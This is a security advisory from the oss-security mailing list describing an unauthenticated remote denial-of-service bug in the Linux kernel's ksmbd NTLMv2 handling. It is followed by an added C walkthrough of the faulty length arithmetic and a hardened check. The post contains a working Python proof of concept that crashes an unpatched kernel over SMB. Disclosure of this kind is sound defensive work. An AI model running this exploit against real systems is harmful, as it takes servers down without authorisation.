Message-ID: <CAGakKvz79Ey501w4LwNsMv4zj6LyYdagNyXWOrEt5Kus9xUmuQ@mail.gmail.com>
Date: Wed, 4 Jan 2023 17:35:09 +0100
From: Hrvoje Mišetić <misetichrvoje@...il.com>
To: oss-security@...ts.openwall.com
Cc: will@...lsroot.io
Subject: Linux kernel: Unauthenticated remote DOS in ksmbd NTLMv2 authentication

There is a heap overflow bug in ksmbd_decode_ntlmssp_auth_blob in which nt_len can be less than CIFS_ENCPWD_SIZE. This results in a negative blen argument for ksmbd_auth_ntlmv2, where it calls memcpy using blen on memory allocated by kmalloc(blen + CIFS_CRYPTO_KEY_SIZE). Note that CIFS_ENCPWD_SIZE is 16 and CIFS_CRYPTO_KEY_SIZE is 8.

We believe this bug can only result in a remote DOS and not privilege escalation or RCE, as the heap overflow occurs when blen is in the range (-8, -1]. The resulting overflow will be too large, and will lead to a kernel panic. When blen is -8, kmalloc returns ZERO_SIZE_PTR, which will cause a null dereference, but the kernel will oops and will usually continue to function.

This bug has existed since 5.15-rc1 and is still present in the upstream source tree, having just been patched in https://github.com/cifsd-team/ksmbd and awaiting merging - the commit ID is 8824b7af409f51f1316e92e9887c2fd48c0b26d6.

We have tested this bug on Ubuntu 20.04 HWE and 22.04 (both running on 5.15.0-56-generic) and can remotely panic the OS immediately. Any attacker that can access the ksmbd SMB port can easily cause a kernel panic. Note that while the attacker has to know a valid username for the service, it does not need to know the password, as the bug happens in the challenge-response phase of the NTLMv2 protocol, making this an unauthenticated attack.

Below is a POC to trigger the bug.
------------------------------------------------------------------------------
#!/usr/bin/python3
from impacket.smbconnection import SMBConnection
import functools
import impacket.ntlm

# using impacket-0.10.0

user = "test"
pw = "test"
domain = "localhost"
address = "127.0.0.1"
target_ip = "127.0.0.1"
port = 445


def post_function(function, postfunction):
    # Wrap `function` so that its return value is passed through `postfunction`.
    @functools.wraps(function)
    def run(*args, **kwargs):
        resp = function(*args, **kwargs)
        return postfunction(resp)
    return run


def post_computeResponseNTLMv2_hook(resp):
    # Replace the NT response (element 0) with a 10-byte value, i.e. shorter
    # than CIFS_ENCPWD_SIZE (16); the LM response and session key are kept.
    return ('A' * 10, resp[1], resp[2])


impacket.ntlm.computeResponseNTLMv2 = post_function(
    impacket.ntlm.computeResponseNTLMv2, post_computeResponseNTLMv2_hook)

smbClient = SMBConnection(address, target_ip, port)
smbClient.login(user, pw, domain)
------------------------------------------------------------------------------

Best,
Hrvoje Mišetić
William Liu
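The length arithmetic the advisory describes, as an added example that is not part of the original post and not ksmbd's code: a constructed, simplified auth-blob layout (a 16-bit NT response length followed by a 32-bit offset, nothing like the real NTLMSSP message) is decoded once without a minimum-length check, so that nt_len below CIFS_ENCPWD_SIZE yields a negative blen, and once with the check a hardened decoder needs before the subtraction. The helpers alloc_size_for and memcpy_len_for show what a negative blen turns into at the allocation and copy sites; the sample blobs are constructed for this example, not captured traffic.

```c
#include <limits.h>
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define CIFS_ENCPWD_SIZE     16  /* values quoted in the advisory */
#define CIFS_CRYPTO_KEY_SIZE  8

/* Hypothetical blob layout used only here:
 * [nt_len: u16 LE][nt_off: u32 LE][... nt_off points at nt_len bytes ...] */
static uint16_t rd16(const uint8_t *p) { return (uint16_t)(p[0] | (p[1] << 8)); }
static uint32_t rd32(const uint8_t *p) {
    return (uint32_t)p[0] | ((uint32_t)p[1] << 8) |
           ((uint32_t)p[2] << 16) | ((uint32_t)p[3] << 24);
}

/* Range check both decoders share: the response must lie inside the blob.
 * Written without off + len so the addition itself cannot overflow. */
static int range_ok(size_t blob_len, uint32_t off, uint16_t len) {
    return off <= blob_len && (size_t)len <= blob_len - off;
}

/* Unchecked pattern: blen = nt_len - CIFS_ENCPWD_SIZE with no minimum-length
 * check, so any nt_len < 16 produces a negative blen. 0 on success, -1 if the
 * response is out of range. */
static int decode_unchecked(const uint8_t *blob, size_t blob_len, int *blen) {
    if (blob_len < 6) return -1;
    uint16_t nt_len = rd16(blob);
    uint32_t nt_off = rd32(blob + 2);
    if (!range_ok(blob_len, nt_off, nt_len)) return -1;
    *blen = (int)nt_len - CIFS_ENCPWD_SIZE;   /* may go negative */
    return 0;
}

/* Hardened pattern: reject nt_len < CIFS_ENCPWD_SIZE before subtracting. */
static int decode_checked(const uint8_t *blob, size_t blob_len, int *blen) {
    if (blob_len < 6) return -1;
    uint16_t nt_len = rd16(blob);
    uint32_t nt_off = rd32(blob + 2);
    if (!range_ok(blob_len, nt_off, nt_len)) return -1;
    if (nt_len < CIFS_ENCPWD_SIZE) return -1;  /* the missing check */
    *blen = (int)(nt_len - CIFS_ENCPWD_SIZE);  /* never negative here */
    return 0;
}

/* What the downstream sites see for a given blen: kmalloc(blen + 8) and a
 * memcpy whose size_t length is the negative int wrapped around. */
static size_t alloc_size_for(int blen)  { return (size_t)(blen + CIFS_CRYPTO_KEY_SIZE); }
static size_t memcpy_len_for(int blen)  { return (size_t)blen; }

/* Constructed sample blobs. */
static const uint8_t SHORT_BLOB[16] = {  /* nt_len = 10, nt_off = 6 */
    0x0a, 0x00, 0x06, 0x00, 0x00, 0x00, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10 };
static const uint8_t OK_BLOB[30] = {     /* nt_len = 24, nt_off = 6 */
    0x18, 0x00, 0x06, 0x00, 0x00, 0x00,
    1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, 14, 15, 16,
    17, 18, 19, 20, 21, 22, 23, 24 };
static const uint8_t BAD_OFF_BLOB[6] = { /* nt_len = 24, nt_off = 100 */
    0x18, 0x00, 0x64, 0x00, 0x00, 0x00 };

/* Wrappers returning blen; INT_MIN (unchecked) / -1 (checked) mean "rejected". */
static int unchecked_blen(const uint8_t *blob, size_t n) {
    int b; return decode_unchecked(blob, n, &b) == 0 ? b : INT_MIN;
}
static int checked_blen(const uint8_t *blob, size_t n) {
    int b; return decode_checked(blob, n, &b) == 0 ? b : -1;
}

int main(void) {
    int b = unchecked_blen(SHORT_BLOB, sizeof SHORT_BLOB);
    printf("unchecked: blen=%d kmalloc(%zu) memcpy len=%zu\n",
           b, alloc_size_for(b), memcpy_len_for(b));
    printf("checked:   blen=%d (rejected if -1)\n",
           checked_blen(SHORT_BLOB, sizeof SHORT_BLOB));
    return 0;
}
```

Run stand-alone, the unchecked path reports blen = -6, an allocation of 2 bytes and a memcpy length of 2^64 - 6, which is the advisory's (-8, -1] case; blen = -8 (nt_len = 8) gives a zero-byte allocation, the ZERO_SIZE_PTR case. The hardened decoder rejects the same blob before any arithmetic happens.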